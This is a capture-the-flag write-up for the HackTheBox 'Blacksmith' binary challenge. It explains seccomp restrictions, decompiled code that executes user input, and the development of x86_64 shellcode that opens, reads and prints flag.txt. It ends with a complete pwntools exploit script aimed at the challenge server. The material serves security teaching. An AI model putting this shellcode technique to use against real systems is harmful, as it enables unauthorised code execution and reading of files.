Hey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:

You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful weapon in the world! You can find him under the label "./flag.txt".

In this write-up, we will learn about seccomp, writing assembly, and performing syscalls.

Summary

  • First looks
  • Finding vulnerability primitives
  • Developing AMD64 (x86_64) assembly
  • Retrieving the flag

First looks

We are given the blacksmith executable binary. Upon running the binary, we are presented with a menu to trade items:

$ ./blacksmith
Traveler, I need some materials to fuse in order to create something really powerful!
Do you have the materials I need to craft the Ultimate Weapon?
1. Yes, everything is here!
2. No, I did not manage to bring them all!
> 1
What do you want me to craft?
1. sword
2. shield
3. bow
> 3
This bow's range is the best!
Too bad you do not have enough materials to craft some arrows too..
The program output

Usually, I start by checking the binary's security using pwntools' checksec. In this case, the security of blacksmith binary is:

$ checksec blacksmith Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments
The checksec output

The fields in checksec mean the following:

  • Arch: the CPU architecture and instruction set (x86, ARM, MIPS, …)
  • RELRO: Relocation Read-Only – secures the dynamic linking process
  • Stack Canaries: protects against stack buffer overflow attacks
  • NX: No eXecute – write-able memory cannot be executed
  • PIE: Position Independable Executable – address randomization
  • RWX: Read Write Execute – there's memory that's RWX

The logical conclusion is that we need to write a shellcode to the RWX memory to read out flag.txt (based on the challenge description).

Finding vulnerability primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork. An example of primitives working together is as follows:

  • an information leak primitive to leak an address
  • an arbitrary write primitive to control the execution flow

… which can work together by controlling the execution flow by writing a leaked address.

Main analysis

When I want to find vulnerability primitives, I open the binary in Ghidra, Ghidra is a reverse engineering tool developed by the NSA (yes, that NSA). I start off analyzing a binary at the main function. In this case, it looked like the following:

void main(void)
{ size_t __n; long in_FS_OFFSET; int i_has_things; int i_option; char *local_20; char *local_18; long __can_token; __can_token = *(long *)(in_FS_OFFSET + 0x28); setup(); // ... __isoc99_scanf("%d",&i_has_things); if (i_has_things != 1) { puts("Farewell traveler! Come back when you have all the materials!"); exit(34); } printf(s_What_do_you_want_me_to_craft?_1._001012e0); __isoc99_scanf("%d",&i_option); sec(); if (i_option == 2) { shield(); } else if (i_option == 3) { bow(); } else if (i_option == 1) { sword(); } else { write(STDOUT_FILENO,local_18,strlen(local_18)); exit(261); } if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) { __stack_chk_fail(); } return;
}
Decompilation of the main function

So, the main function does the following:

  1. setup()
  2. sec()
  3. shield(), bow() or sword()

In addition to that, the main function uses canary tokens in variable __can_token. As you can see, if __can_token is not equal to the original value, it means that stack corruption has been detected and hence, __stack_chk_fail is called which exits the program.

The function setup removes the buffer for stdout and stdin, which is standard and hence not interesting. In contrast, the sec function is interesting.

Sec function

void sec(void) { void* ctx; long in_FS_OFFSET; long __can_token; __can_token = *(long *)(in_FS_OFFSET + 0x28); // ... // allow sys_read, sys_write, // sys_open, sys_exit ctx = seccomp_init(0); seccomp_rule_add(ctx,0x7fff0000,2,0); seccomp_rule_add(ctx,0x7fff0000,0,0); seccomp_rule_add(ctx,0x7fff0000,1,0); seccomp_rule_add(ctx,0x7fff0000,60,0); seccomp_load(ctx); if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) { __stack_chk_fail(); } return;
}
The sec function

We can see that the sec function primarily creates an allow list using seccomp of the syscalls sys_read, sys_write, sys_open, and sys_exit. (Note that the naming convention for internal syscall functions is a sys_ prefix. When we say sys_read, we mean the syscall read.) By doing this, the developer of the program prevents us from executing our shell on the server since we would need to sys_execve("/bin/sh", NULL, NULL) for that. Because sys_execve is not on the allow list, we cannot use it. Remember this for later.

Shield analysis

Furthermore, we have the shield(), bow() or sword() calls in main(). The bow() and sword() functions crash the program before a user can give input, which means that's irrelevant. So basically, the vulnerability must be in shield().  

void shield(void) { size_t strlen; long in_FS_OFFSET; char buf[72]; long __can_token; __can_token = *(long *)(in_FS_OFFSET + 0x28); strlen = ::strlen(s_Excellent_choice!_This_luminous_s_00101080); write(1,s_Excellent_choice!_This_luminous_s_00101080,strlen); strlen = ::strlen("Do you like your new weapon?\n> "); write(1,"Do you like your new weapon?\n> ",strlen); read(0,buf,63); (*(code *)buf)(); if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) { // WARNING: Subroutine does not return __stack_chk_fail(); } return;
}
The shield function

What sticks out to me in this function is that we have user input and are calling a variable like a function using (*(code *)buf)();. The code (*(code *)buf)(); is equivalent to the ASM below:

00100dd9 48 8d 55 LEA RDX, [RBP - 0x50] ; code* RDX = &buf b0
00100ddd b8 00 00 MOV RAX, 0x0 00 00
00100de2 ff d2 CALL RDX ; RDX()
ASM version of (*(code *)buf)();

The  (*(code *)buf)(); function call executes the buf variable on the stack as if it was assembly. This means we can inject assembly into the program.

Developing AMD64 (x64_86) assembly

We have an arbitrary execution primitive so we need to write an assembly payload. The difficulty with this is that:

  • We have 63 bytes to work with:
 // shield() function read(STDIN_FILENO,buf,63); (*(code *)buf)();
Part of the shield() function
  • We can only use sys_read, sys_write, sys_open and sys_exit:
 // sec() function // allow sys_read, sys_write, // sys_open, sys_exit ctx = seccomp_init(0); seccomp_rule_add(ctx,0x7fff0000,2,0); seccomp_rule_add(ctx,0x7fff0000,0,0); seccomp_rule_add(ctx,0x7fff0000,1,0); seccomp_rule_add(ctx,0x7fff0000,60,0); seccomp_load(ctx);
Part of the sec() function
  • We do not have a stack address (ASLR)

However, the challenge description told us that we need to read the flag.txt file. Hence, the strategy for this payload is opening flag.txt, reading flag.txt into a buffer, and writing the buffer to stdout.

To interact with those files, we need to utilize system calls ("syscalls"). Syscalls are essentially an ABI (binary API) with the Linux kernel which is like the god of the operating system. The kernel provides memory management, CPU scheduling, driver management, hardware IO, et cetera. If you want to learn more about the kernel, the book "Linux Kernel Development" by Robert Love is an excellent way to learn more about the kernel (I've read it).

I used a Linux x64 syscall table as a reference for using the syscalls. Essentially the code should do the following:

// sys_open(char* filename, int flags, int mode)
int fd = sys_open("flag.txt", 0, 0); // sys_read(int fd, char* buf, size_t count)
int written = sys_read(fd, buf, 0x9999); // sys_write(int fd, char* buf, size_t count)
sys_write(1, buf, written);
C pseudocode of the ASM payload

I came up with the following ASM:

mov rax, 2
lea rdi, [rip+41] ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, 30
syscall mov rdx, rax
mov rax, 1
mov rdi, rax
syscall
Payload used to leak flag.txt

Since we have only 63 bytes to work with, I had to be creative. In assembly, most bytes are allocated to constant values like mov rax, 2 since it will store an 8-byte 0x00000000 00000002 into the instruction. That means we can save a lot of bytes by reusing register values.

I eventually refactored the payload into 46 bytes:

push r10
inc r10
mov rax, r10
lea rdi, [rip+31] ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall mov rdx, rax
pop rax
mov rdi, rax
syscall
The final compressed ASM payload

Retrieving the flag

Now we have a steady payload, we need to send it to the application. I made the following script using pwntools:

#!/usr/bin/python3 from pwn import remote, gdb, ELF, asm, context
import time e = ELF('blacksmith') is_remote = True
if is_remote: p = remote("64.227.36.64", 32615)
else: p = e.process() context.binary = e.path # set the pwntools context for asm() p.sendlineafter(b"all!\n> ", b'1')
p.sendlineafter(b"\xf0\x9f\x8f\xb9\n> ", b'2') # get to shield() payload = asm(f'''push r10
inc r10
mov rax, r10
lea rdi, [rip+31]
xor rsi, rsi
xor rdx, rdx
syscall mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall mov rdx, rax
pop rax
mov rdi, rax
syscall''') print(f"writing ASM with {len(payload)} bytes") # payload = payload + filler + filename
payload += b"flag.txt"
print(f"writing ASM+filename with {len(payload)} bytes") p.sendafter(b"weapon?\n> ", payload)
while True: print(p.recvline())
The final script used for sending the payload to the application